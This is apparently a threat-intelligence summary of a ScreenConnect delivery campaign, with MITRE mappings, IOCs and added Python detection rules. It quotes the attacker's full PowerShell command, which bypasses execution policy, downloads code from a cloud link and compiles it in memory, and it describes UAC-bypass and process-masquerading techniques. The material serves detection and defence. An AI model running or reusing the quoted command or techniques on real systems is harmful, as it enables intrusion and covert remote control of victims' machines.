In-Memory Loader Drops ScreenConnect

Zscaler ThreatLabz detailed a multi-stage campaign that used a fake Adobe Acrobat Reader download to deliver a heavily obfuscated VBScript loader which staged PowerShell and an in-memory .NET loader to install ConnectWise ScreenConnect. The chain used runtime string reconstruction, heavy obfuscation, PEB image-name spoofing, and abuse of auto-elevated COM objects to evade detection and obtain elevated privileges. #ScreenConnect #VBS_Downloader

Keypoints

  • Attackers hosted a fraudulent page impersonating Adobe that automatically delivered a heavily obfuscated VBScript loader named Acrobat_Reader_V112_6971.vbs.
  • The VBScript reconstructs object names and commands at runtime to defeat static analysis and launches PowerShell with -ExecutionPolicy Bypass to continue staging.
  • PowerShell compiles and executes a C# in-memory .NET loader (Add-Type -ReferencedAssemblies) that embeds a compiled assembly in a byte array and invokes it via reflection (Assembly.Load(byte[])).
  • The in-memory loader uses PEB manipulation to rewrite the process image name/path (masquerading as C:\Windows\winhlp32.exe) to blend with legitimate processes and avoid EDR detection.
  • Attackers abused auto-elevated COM objects (via an elevation moniker and CoGetObject) to bypass UAC and obtain elevated privileges without prompting the user.
  • The final stage downloads and installs ScreenConnect (ScreenConnect.ClientSetup.msi from x0[.]at/qOfN.msi) using curl.exe and msiexec, leaving a legitimate RMM tool installed for post-compromise access.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The campaign relied on a user landing on a fake Adobe page that automatically downloaded and delivered a VBScript loader. [‘Upon accessing the page, the victim’s browser automatically downloads a heavily obfuscated VBScript file named Acrobat_Reader_V112_6971.vbs, which serves as a loader.’]
  • [T1059.001] PowerShell – The VBScript launches PowerShell with -ExecutionPolicy Bypass to download, read, and compile C# source in memory. [‘powershell.exe -ExecutionPolicy Bypass -command ""New-Item -ItemType Directory -Path 'C:\Windows\Temp' -Force | Out-Null; curl.exe -L 'https://drive.google[.]com/uc?id=1TVJir-OlNZrLjm5FyBMk_hDjG9BV1zCy&export=download' -o 'C:\Windows\Temp\FileR.txt';Start-Sleep -Seconds 8;$source = [System.IO.File]::ReadAllText('C:\Windows\Temp\FileR.txt');Start-Sleep -Seconds 1;Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $source -Language CSharp; [HelloWorld]::SayHello()""’]
  • [T1059.005] Visual Basic / VBScript – The initial loader is an obfuscated VBScript that dynamically reconstructs object names and uses Chr() calls to build commands at runtime. [‘the VBScript loader dynamically constructs the object name using nested Replace() functions … The VBScript loader then uses Run() to execute a follow-on command that is assembled from numerous Chr() calls…’]
  • [T1027] Obfuscated Files or Information – Attackers split and reversed method/type names and stored strings in transformed forms to hinder static analysis. [‘the attackers tried to avoid static analysis by splitting up method and type names. For example, “Lo”+”ad” (i.e. “Load”) and “Ent”+”ryPo”+”int” (i.e. “EntryPoint”)’]
  • [T1105] Ingress Tool Transfer – Additional payloads and the ScreenConnect installer were retrieved from external locations (Google Drive and a direct URL). [‘curl.exe -L 'https://drive.google[.]com/uc?id=1TVJir-… -o 'C:\Windows\Temp\FileR.txt'’]
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – The loader constructs an elevation moniker (stored reversed) and calls CoGetObject to obtain elevated COM objects for privileged actions. [‘the loader then calls CoGetObject to request the elevated COM object. If this action is successful, the loader returns an interface that can be used for privileged actions’]
  • [T1036] Masquerading – The loader modifies PEB fields (FullDllName and BaseDllName) to present a spoofed process image path/name (C:\Windows\winhlp32.exe) to user-mode tools. [‘overwriting FullDllName and BaseDllName to C:\Windows\winhlp32.exe / winhlp32.exe’]
  • [T1055] Process Injection / In-memory Execution – The .NET component loads an embedded assembly from a byte array and invokes its entry point entirely in memory via Assembly.Load(byte[]) and EntryPoint.Invoke(). [‘the loader then uses SayHello() and reflection to load the assembly via Assembly.Load(byte[]) and invoke the assembly’s entry point using EntryPoint.Invoke().’]
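As an added defensive example (this code is not from the Zscaler report or its authors), the Python below turns the staging chain above into process-creation detection rules and correlates them across events: a script host spawning PowerShell with -ExecutionPolicy Bypass, in-memory C# compilation via Add-Type, curl.exe writing into C:\Windows\Temp, and msiexec installing an MSI from that directory. The sample events are constructed to mimic Sysmon Event ID 1 records, and the Google Drive file id in them is a placeholder.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); they are
# not taken from the Zscaler report, and the Drive file id is a placeholder.
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": (r"powershell.exe -ExecutionPolicy Bypass -command New-Item -ItemType Directory "
             r"-Path 'C:\Windows\Temp' -Force | Out-Null; curl.exe -L "
             r"'https://drive.google.com/uc?id=PLACEHOLDER_ID&export=download' -o "
             r"'C:\Windows\Temp\FileR.txt'; $source = [System.IO.File]::ReadAllText("
             r"'C:\Windows\Temp\FileR.txt'); Add-Type -ReferencedAssemblies "
             r"'Microsoft.CSharp' -TypeDefinition $source -Language CSharp; [HelloWorld]::SayHello()")},
    {"id": 2, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Windows\Temp\ScreenConnect.ClientSetup.msi /quiet"},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -NoProfile -command Get-Process | Sort-Object CPU"},
]

# (rule name, MITRE technique, predicate). Patterns mirror the staging chain the
# report describes; adjust the staging directory and hosts for your environment.
RULES = [
    ("script_host_spawns_bypass_powershell", "T1059.001",
     lambda e: re.search(r"\\[wc]script\.exe$", e["parent"], re.I)
     and re.search(r"-ExecutionPolicy\s+Bypass", e["cmd"], re.I)),
    ("in_memory_csharp_compile", "T1027",
     lambda e: re.search(r"Add-Type\b.*-TypeDefinition", e["cmd"], re.I)),
    ("curl_download_to_windows_temp", "T1105",
     lambda e: re.search(r"curl\.exe\s.*-o\s+'?C:\\Windows\\Temp\\", e["cmd"], re.I)),
    ("msiexec_from_windows_temp", "T1105",
     lambda e: re.search(r"msiexec(\.exe)?\s.*C:\\Windows\\Temp\\.*\.msi", e["cmd"], re.I)),
]

def evaluate(event):
    """Return the (rule name, technique id) pairs that match a single event."""
    return [(name, tid) for name, tid, pred in RULES if pred(event)]

def score_chain(events):
    """Correlate across events: the full chain needs script-host PowerShell staging
    with in-memory compilation plus a later MSI install out of the staging directory.
    Returns {event id: [rule names]} and a verdict string."""
    hits = {e["id"]: [name for name, _ in evaluate(e)] for e in events}
    seen = {name for names in hits.values() for name in names}
    staged = {"script_host_spawns_bypass_powershell", "in_memory_csharp_compile"} <= seen
    installed = "msiexec_from_windows_temp" in seen
    return hits, ("screenconnect_loader_chain" if staged and installed else "no_chain")
```

The benign third event (explorer.exe launching PowerShell without a bypass policy) matches nothing, which keeps the correlation from firing on ordinary administrative use.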

Indicators of Compromise

  • [File Hash] VBScript and assembly hashes observed in the campaign – E4B594A18FC2A6EE164A76BDEA980BC0 (VBS), 3EFFADB977EDDD4C48C7850C8DC03B13C (.NET assembly), and 6 more hashes.
  • [URL / Domain] Fraudulent lure and installer download URLs – eshareflies[.]im/ad/ (fraudulent Adobe page), https://x0[.]at/qOfN.msi (ScreenConnect.ClientSetup.msi).
  • [Cloud storage links] Staging and payload hosting on Google Drive – drive.google[.]com/uc?id=1TVJir-OlNZrLjm5FyBMk_hDjG9BV1zCy&export=download, drive.google[.]com/uc?id=1pyyQRpUmH0YtPG-VqvMNzKUo9i8-RZ7L&export=download.
  • [File Names] Downloaded and staged filenames used by loaders – Acrobat_Reader_V112_6971.vbs (VBScript loader), ScreenConnect.ClientSetup.msi (installer from x0[.]at/qOfN.msi).
  • [File Type] MSI installer used for final deployment – ScreenConnect.ClientSetup.msi (downloaded and executed via msiexec).

Read more: https://www.zscaler.com/blogs/security-research/memory-loader-drops-screenconnect